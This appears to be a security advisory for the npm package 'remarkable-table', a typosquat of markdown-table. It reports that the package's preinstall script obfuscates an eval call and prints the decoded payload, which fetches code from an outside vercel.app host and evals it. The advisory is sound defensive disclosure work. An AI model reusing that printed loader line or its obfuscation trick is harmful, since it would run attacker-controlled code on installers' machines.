MAL-2026-10447
Malicious code in remarkable-table (npm)
상세
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (464cab930bcf948abf49517f78a3ee1abb8b89c8f9c90f199bd3446c902d8e1e) The package's preinstall script runs index.d.js, which reconstructs the identifier 'eval' from a character-code array ([101,118,97,108]) and base64-decodes an embedded payload that resolves to `(async()=>eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root3').then(r=>r.text())))();`. On `npm install`, the package performs an outbound HTTPS request to everydaynodechecker-39143n.vercel.app and passes the response body to eval, executing arbitrary attacker-controlled JavaScript on the installer's machine. Both the sink (eval) and the destination are obfuscated to evade casual review. The destination is unrelated to any legitimate table/markdown functionality, and the package name is a typosquat of the widely used `markdown-table`.
이 버전이 영향받나요?
사용 중인 패키지 버전을 입력하면 즉시 평가합니다.
영향 패키지
No fixed version published yet for remarkable-table (npm). Pin to a known-safe version or switch to an alternative.